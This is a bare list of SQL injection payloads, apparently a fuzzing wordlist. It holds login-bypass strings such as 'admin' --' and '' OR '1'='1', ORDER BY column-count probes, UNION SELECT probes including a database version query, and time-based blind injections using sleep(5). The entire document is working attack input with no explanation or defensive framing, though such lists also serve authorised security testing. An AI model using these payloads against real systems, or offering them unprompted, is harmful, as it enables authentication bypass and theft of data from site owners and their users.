' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' OR '1'='1'/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
' OR 'x'='x
' OR 'a'='a
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
1' UNION SELECT NULL,NULL,NULL--
' UNION SELECT @@version--
admin") or ("1"="1
admin") or ("1"="1"--
admin") or 1=1--
admin") or 1=1#
1')) or sleep(5)='
1')) or sleep(5)#
1')) or sleep(5)--
1') and sleep(5)='
1') and sleep(5)#
1') and sleep(5)--